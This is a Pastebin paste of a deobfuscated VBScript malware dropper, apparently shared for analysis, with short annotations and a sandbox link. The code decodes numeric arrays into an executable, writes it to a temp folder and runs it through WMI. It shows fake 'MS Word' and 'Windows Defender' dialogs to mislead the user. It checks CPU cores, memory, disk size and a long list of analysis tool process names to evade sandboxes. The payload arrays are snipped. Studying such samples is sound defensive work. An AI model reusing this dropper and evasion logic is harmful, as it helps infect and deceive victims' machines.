Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- //full sample in https://app.any.run/tasks/c25c082c-7712-4e62-80f1-bdea4d1e6953/
- //and https://pastebin.com/c0bFqB83
- // block of arrays snipped
- .
- .
- .
- //this section renames the arrays from above
- LTGogLwjFf = EaKtteX
- PzXVYC = gzHuJzgYUe
- MytMMIUj = uIabfRjRKH
- zqVwsMYFP = FDZOhyQaFl
- OfpYCQBz = kcmwdueszi
- RWULNJYfNU = GgUAbnaP
- RXlgQeJKi = ejESLAxKfy
- VjjkkfpdN = nsKSeZYg
- UfaCHF = WhDJjXxV
- ivWVxdXGk = rmHaGhbsPG
- usVQEC = JLxSdpu
- FBLqXG = JXrbOq
- hWKbQz = DUfaZDlzn
- vbZukXE = VWGjtr
- LejZgQG = ZyIuWe
- jZWTcsX = oIFfucVB
- IynXcPAt = iJLCLxqiGw
- lzlnlJB = VScSEX
- lHIOGj = XJJeOtWrna
- xlFtoy = ilMXhTB
- wXzVHoT = LxMJqmV
- LAUUMcmF = pzRBLxlK
- cYAEZdPp = OBsvvmqtd
- DkvTtrEhE = OqNQvYogYR
- rCpbGjwADJ = zTwBWt
- KEBybBm = ZtxvtAa
- DcxZoyI = ysLrBpUmf
- tsObzOtGhv = HDJYQH
- DbuGdDX = XJcHMjMOqt
- jdtFpc = oNwwEZh
- wQTFXgY = opvhAX
- pJEszL = rRunjXeE
- DmHcbP = ZSYcelKIU
- //decoding function using the CONST defined at bottom
- fUNctIOn mlQnGb(zaqIAdtayJ)
- ZnjjgeFvDx = 0
- XzVYLFB = ""
- Do wHIlE ZnjjgeFvDx = < UBOUnd(zaqIAdtayJ)
- XzVYLFB = XzVYLFB + ChrW(zaqIAdtayJ(ZnjjgeFvDx) - 61)
- ZnjjgeFvDx = ZnjjgeFvDx + 1
- loOp
- mlQnGb = XzVYLFB
- enD fUNctIOn
- fUNctIOn HNrrPohP(zaqIAdtayJ)
- if zaqIAdtayJ = 1 TheN
- zaqIAdtayJ = 2
- else
- zaqIAdtayJ = 1
- enD if
- IKEOHo = WScript.CReATeObjECT("Scripting.FileSystemObject").geTsPecIalFoLDEr(zaqIAdtayJ)
- HNrrPohP = CStr(IKEOHo) + "\"
- enD fUNctIOn
- // create/check marker file
- fUNctIOn VsSroV()
- DIM HFjKhoc
- set HFjKhoc = CReATeObjECT("Scripting.FileSystemObject")
- if (HFjKhoc.fIleeXisTS(HNrrPohP(1) + "kwaOcRHq")) TheN
- wscRipT.quIT
- else With HFjKhoc.createTextFile(HNrrPohP(1) + "kwaOcRHq")
- .Write("yvzklleh")
- .close
- enD With
- enD if
- enD fUNctIOn
- // decode/write payload from arrays above
- fUNctIOn pdjrgmIW()
- DIM duUZkQri
- DIM mAcAZSZ
- set duUZkQri = CReATeObjECT(ADODB.Stream)
- set mAcAZSZ = CReATeObjECT(ADODB.Stream)
- duUZkQri.Type = 2
- duUZkQri.OpEn()
- njEXypQQW = ARraY(LTgoGlwjFF, pzXVyc, mytmMiUJ, ZqvwsMyFp, ofpYcQbz, RWULNJyfNU, RxLgQeJKi, VjJKkfpDN, UFaChf, ivwvxDxGK, USVQec, FBlQXg, hWkbqz, vbZuKxe, lEjzGQG, jzWtcsX, IYnxCPAT, lzlnljB, lHIogJ, xlftOY, WxZVHOt, LaUUMCMF, cyAeZDpp, DkvTtrEhe, RcPBGJWadj, KebYbbM, DcxZOyi, TsOBzOtGhv, DbUGDDx, jdTFpC, WqTFXgy, pJESzL, dMhCbP)
- For Each File in njEXypQQW
- duUZkQri.wRitetExT mlQnGb(File)
- NeXT
- duUZkQri.Position = 0
- mAcAZSZ.Type = 2
- mAcAZSZ.Charset = "ISO-8859-1"
- mAcAZSZ.OpEn()
- duUZkQri.cOpYtO(mAcAZSZ)
- mAcAZSZ.saVetoFiLe HNrrPohP(1) + "LbAeBeM.exe", 2
- duUZkQri.close()
- mAcAZSZ.close()
- enD fUNctIOn
- // random message to slow analysis
- fUNctIOn vltBnKtEE()
- xjLQFLXXrC = NOw()
- uYLfpH = CReATeObjECT(WScript.Network).UserName
- QFVdCzIzfc = mSgbox("User " + uYLfpH + "An unexpected error has occurred. You request cannot be processed at this time. Please try again later. (0x836505785)", vbSystemModal + vbExclamation, "MS Word")
- fpxSupp = NOw()
- if DATedIfF(mlQnGb(Array(g5)), xjLQFLXXrC, fpxSupp) < 2 TheN
- NCnlcRd
- enD if
- enD fUNctIOn
- // random message to slow analysis
- fUNctIOn vltBnKtEE2()
- xjLQFLXXrC = NOw()
- uYLfpH = CReATeObjECT(WScript.Network).UserName
- QFVdCzIzfc = mSgbox("File 0x836505785 checked, no malicious activity detected! ", vbSystemModal + vbInformation, "Windows Defender")
- fpxSupp = NOw()
- if DATedIfF(mlQnGb(Array(g5)), xjLQFLXXrC, fpxSupp) < 2 TheN
- NCnlcRd
- enD if
- enD fUNctIOn
- // run payload
- fUNctIOn RlYBzEfO()
- set LQiSDvN = getOBjEct("winmgmts:Win32_Process")
- LQiSDvN.Create HNrrPohP(1) + "LbAeBeM.exe", null, null, processid
- enD fUNctIOn
- fUNctIOn hAtgPLDZwG()
- VsSroV
- pdjrgmIW
- RlYBzEfO
- enD fUNctIOn
- // wait function
- fUNctIOn NCnlcRd()
- ZnjjgeFvDx = 61
- XzVYLFB = 836505785
- Do wHIlE ZnjjgeFvDx < 5046157
- if (ZnjjgeFvDx = 5046157) TheN
- wscRipT.quIT
- else enD if
- if (ZnjjgeFvDx = 5045940) TheN
- XzVYLFB = XzVYLFB + 1+61
- else enD if
- ZnjjgeFvDx = ZnjjgeFvDx + 1
- loOp
- if (XzVYLFB = 836505785) TheN
- VoPyloUugTNSLHR = 76
- NCnlcRd
- enD if
- enD fUNctIOn
- // processor count check
- fUNctIOn oNVTre()
- ECmYgVr = 0
- set LQiSDvN = getOBjEct("winmgmts:\\.\root\cimv2")
- set maHiCdNgJ = LQiSDvN.ExecQuery("Select * from Win32_Processor", , 48)
- For Each RUqTtIFO In maHiCdNgJ
- if RUqTtIFO.NumberOfCores < 3 TheN
- ECmYgVr = True
- enD if
- NeXT
- if ECmYgVr TheN
- NCnlcRd
- NCnlcRd
- else FzRVVeIxhUfRAbJRukeLZf = 73
- enD if
- enD fUNctIOn
- // anti-analysis checks
- fUNctIOn NtcpEnhq()
- EFfLttPZRuBmDOaxqXM = 17
- DmagdOrPy = "cis.exe", "cmdvirth.exe", "alive.exe", "filewatcherservice.exe", "ngvmsvc.exe", "sandboxierpcss.exe", "analyzer.exe", "fortitracer.exe", "nsverctl.exe", "sbiectrl.exe", "angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","cff explorer.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe", "qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","winalysis.exe","emul.exe","malmon.exe","RepUtils32.exe","winapioverride32.exe","ethereal.exe","mbarun.exe","RepUx.exe","windbg.exe","ettercap.exe","mdpmon.exe","runsample.exe","windump.exe","fakehttpserver.exe","mmr.exe","samp1e.exe","winspy.exe","fakeserver.exe","mmr.exe","sample.exe","wireshark.exe","Fiddler.exe","multipot.exe","sandboxiecrypto.exe","filemon.exe","netsniffer.exe","sandboxie.com","launch.exe")
- set LQiSDvN = getOBjEct("winmgmts:\\.\root\cimv2")
- set maHiCdNgJ = LQiSDvN.ExecQuery("Select * from Win32_Processor")
- For Each RUqTtIFO In maHiCdNgJ
- For Each GyIlWhxMD In DmagdOrPy
- if RUqTtIFO.Name = GyIlWhxMD TheN
- NCnlcRd
- enD if
- NeXT
- NeXT
- enD fUNctIOn
- // file count check
- fUNctIOn FTJdmYOm()
- if CReATeObjECT("Scripting.FileSystemObject").GetFolder(HNrrPohP(1)).Files.Count < 1 TheN
- NCnlcRd
- NCnlcRd
- else enD if
- enD fUNctIOn
- // memory size check
- fUNctIOn UvuuEE()
- set LQiSDvN = getOBjEct("winmgmts:\\.\root\cimv2")
- set maHiCdNgJ = LQiSDvN.ExecQuery("Select * from Win32_ComputerSystem")
- For Each RUqTtIFO In maHiCdNgJ
- trQCYmYY = trQCYmYY + Int((RUqTtIFO.TotalPhysicalMemory) / 1048576) + 1
- NeXT
- if trQCYmYY < 1024 TheN
- NCnlcRd
- NCnlcRd
- enD if
- enD fUNctIOn
- // disk size check
- fUNctIOn CBWYiVOXY()
- set LQiSDvN = getOBjEct("winmgmts:\\.\root\cimv2")
- set maHiCdNgJ = LQiSDvN.ExecQuery("Select * from Win32_LogicalDisk")
- For Each RUqTtIFO In maHiCdNgJ
- trQCYmYY = trQCYmYY + Int(RUqTtIFO.Size / 1073741824)
- NeXT
- if trQCYmYY < 60 TheN
- NCnlcRd
- NCnlcRd
- enD if
- enD fUNctIOn
- FTJdmYOm
- vltBnKtEE2
- vltBnKtEE
- UvuuEE
- NtcpEnhq
- oNVTre
- CBWYiVOXY
- hAtgPLDZwG
- conST m8 = 262
- CONST mM8 = 511
- COnST O1 = 172
- cOnST u9 = 259
- coNst a8 = 264
- ConSt Aa8 = 302
- CoNST p6 = 185
- CONSt E1 = 93
- CoNSt W6 = 82
- cONSt wW6 = 287
- COnST n9 = 267
- cONst nn9 = 275
- ConSt v2 = 206
- CoNst G4 = 110
- COnsT Q9 = 311
- conSt Qq9 = 387
- CoNST H7 = 260
- cOnST u2 = 156
- coNsT uu2 = 227
- cONST W9 = 253
- cONSt Q4 = 191
- CONsT z7 = 308
- CoNsT I1 = 228
- coNsT ii1 = 244
- CONsT A5 = 305
- cONst v5 = 62
- cOnST x5 = 220
- ConST F3 = 151
- CONsT C8 = 125
- coNST D2 = 67
- cONST d8 = 313
- CoNSt u7 = 234
- conSt h6 = 75
- cOnST U = 83
- CoNSt uU = 267
- CONst r = 269
- CONST A4 = 229
- ConsT U4 = 118
- ConSt Y4 = 63
- CoNsT v = 271
- ConSt VV = 357
- cONst k8 = 95
- CoNST Kk8 = 222
- coNsT E5 = 266
- CONSt M3 = 294
- Const n4 = 71
- cONsT e6 = 224
- ConsT t5 = 265
- consT z8 = 235
- cONSt R6 = 291
- COnSt Y3 = 146
- ConST yY3 = 161
- ConSt B1 = 290
- CONSt v9 = 201
- cOnSt w2 = 158
- cOnSt ww2 = 255
- CONsT a2 = 226
- COnst c6 = 109
- cOnST Cc6 = 224
- cONSt V4 = 141
- coNST P8 = 104
- COnsT D4 = 66
- CoNSt dD4 = 190
- Const E = 200
- COnSt K1 = 131
- coNst kK1 = 356
- coNst t2 = 289
- coNSt x1 = 170
- consT v7 = 68
- CONST P2 = 108
- cONst w8 = 115
- ConsT wW8 = 149
- ConsT i4 = 77
- CONsT L1 = 214
- cOnSt L5 = 155
- conSt LL5 = 194
- CoNSt B5 = 149
- ConST z4 = 121
- cOnSt T6 = 78
- cONsT H1 = 198
- cONst J3 = 122
- coNST L4 = 227
- COnST F1 = 246
- coNst k6 = 307
- conST g = 256
- COnSt L = 89
- cONSt LL = 316
- coNSt I8 = 85
- COnsT j9 = 207
- COnSt B3 = 163
- CoNSt w4 = 177
- coNsT j2 = 232
- COnSt K5 = 184
- CONst i9 = 139
- CONst n1 = 252
- cONst S2 = 213
- cOnst l2 = 74
- COnSt Z6 = 270
- COnsT P3 = 132
- COnST p7 = 243
- cONsT l6 = 222
- cONst u6 = 152
- coNST s = 190
- coNst C7 = 102
- CoNSt Z1 = 76
- cONSt x9 = 134
- consT Y2 = 117
- CONst f8 = 106
- ConSt d6 = 208
- coNSt Dd6 = 416
- coNSt S7 = 196
- Const M4 = 241
- CoNsT j8 = 126
- coNSt jJ8 = 298
- cONst m6 = 188
- cOnST mM6 = 315
- Const A3 = 315
- cOnst L3 = 135
- CONsT y = 137
- coNsT W3 = 231
- cOnsT N8 = 178
- COnST l7 = 171
- coNsT X6 = 61
- CONSt xX6 = 269
- coNsT e4 = 94
- const d3 = 199
- conST dD3 = 273
- cONSt U3 = 129
- conST Uu3 = 242
- cOnsT p5 = 257
- cOnST X = 301
- cONsT H4 = 261
- cOnST hH4 = 503
- COnst M = 316
- consT G1 = 123
- ConsT W7 = 300
- CoNSt M7 = 87
- CoNST Mm7 = 130
- coNsT i6 = 80
- cOnST Q2 = 120
- CONst k2 = 258
- CoNst O7 = 127
- conST oo7 = 314
- cOnst U5 = 230
- cOnst r9 = 299
- CoNSt e8 = 169
- CoNst eE8 = 420
- cONSt S3 = 303
- COnSt g9 = 98
- cONSt gG9 = 269
- CoNsT t7 = 296
- coNst S6 = 279
- cONSt i = 73
- consT B7 = 275
- cOnst S4 = 145
- cONST B8 = 148
- coNsT B = 112
- COnST h8 = 143
- CoNsT p = 312
- ConST PP = 527
- CONSt t3 = 225
- cONSt A = 202
- conST y5 = 215
- CONSt P1 = 219
- COnST q1 = 119
- ConST h3 = 88
- coNSt n6 = 65
- CONST nN6 = 121
- ConSt H = 250
- CONSt d1 = 293
- coNst e2 = 205
- COnST Z3 = 297
- cONst n3 = 223
- cONsT J = 90
- ConSt Jj = 138
- ConST x2 = 278
- cOnsT O2 = 183
- CoNSt e7 = 255
- ConST eE7 = 475
- ConSt s5 = 99
- CONst SS5 = 313
- CoNsT P4 = 162
- cOnsT G3 = 111
- CONST GG3 = 203
- COnST O8 = 204
- consT J1 = 147
- CoNst F9 = 284
- cONSt C9 = 281
- ConST R3 = 240
- ConsT rr3 = 376
- COnST b9 = 292
- CoNsT q5 = 92
- cONst z = 276
- cONsT Zz = 410
- COnSt o9 = 142
- cONSt M5 = 157
- ConsT K7 = 210
- CONSt f5 = 179
- CONst N5 = 166
- coNST nN5 = 358
- const a9 = 100
- COnst s8 = 209
- CONSt C5 = 124
- cONsT r2 = 306
- coNst R1 = 298
- CoNSt I2 = 154
- coNsT Q = 263
- COnSt Qq = 402
- coNst x4 = 239
- CONSt O4 = 251
- cOnst Oo4 = 365
- cONsT r7 = 114
- Const h5 = 168
- CoNST x8 = 72
- CoNst B2 = 153
- const Z5 = 309
- COnsT U8 = 81
- CoNST k9 = 193
- const I3 = 138
- COnsT U1 = 314
- CONST X3 = 195
- cOnST P9 = 160
- CONst A6 = 159
- conSt k4 = 244
- CONSt KK4 = 466
- cONsT v1 = 254
- CoNsT H2 = 288
- ConST HH2 = 482
- cONst v6 = 180
- cOnST F6 = 212
- conST Ff6 = 311
- COnsT F2 = 64
- CoNST v3 = 133
- conST n = 295
- CoNsT nn = 391
- cONsT A1 = 97
- coNst AA1 = 126
- COnsT o = 140
- cONST d5 = 113
- COnSt b4 = 274
- COnSt bb4 = 337
- cONSt W = 247
- ConsT o5 = 101
- cONST n7 = 174
- COnST G8 = 286
- COnsT Gg8 = 471
- coNSt Y1 = 280
- conST F = 79
- ConSt e9 = 70
- CONsT o3 = 272
- CONST Q6 = 161
- CoNSt QQ6 = 238
- cONsT J5 = 211
- CONST i7 = 233
- CONSt Z9 = 216
- ConsT h9 = 283
- const W5 = 186
- cOnST M2 = 173
- ConSt D7 = 221
- cOnST F4 = 187
- coNsT V8 = 203
- consT z2 = 182
- coNST Zz2 = 381
- ConSt F7 = 302
- cONST X7 = 150
- cONSt R5 = 304
- CoNsT C3 = 287
- ConST T1 = 237
- coNst q8 = 285
- CONst g5 = 176
- cONST Gg5 = 252
- conST Q7 = 69
- cOnsT qq7 = 95
- cONSt S1 = 189
- ConsT t8 = 236
- conST TT8 = 333
- CoNst J4 = 167
- COnsT e3 = 128
- CoNst Ee3 = 317
- cONST B6 = 165
- Const O6 = 181
- CONST J7 = 238
- ConSt jJ7 = 238
- CoNst r8 = 282
- cONsT C2 = 84
- ConsT S9 = 273
- CONST l8 = 136
- Const C1 = 175
- cOnsT CC1 = 303
- cONst g6 = 194
- CONST M1 = 217
- CONSt w1 = 103
- CoNst a7 = 192
- COnSt D9 = 144
- COnsT k = 310
- Const G7 = 105
- coNsT C = 197
- Const M9 = 249
- CONST r4 = 245
- cONSt d = 107
- ConSt dD = 286
- consT k3 = 86
- CONST J6 = 242
- CoNSt t9 = 130
- conSt tT9 = 217
- const q3 = 164
- coNsT T4 = 268
- cOnSt g2 = 277
- COnsT C4 = 248
- ConsT i5 = 96
- cONst L9 = 218
- coNSt n2 = 91
- cOnsT t = 116
Add Comment
Please, Sign In to add comment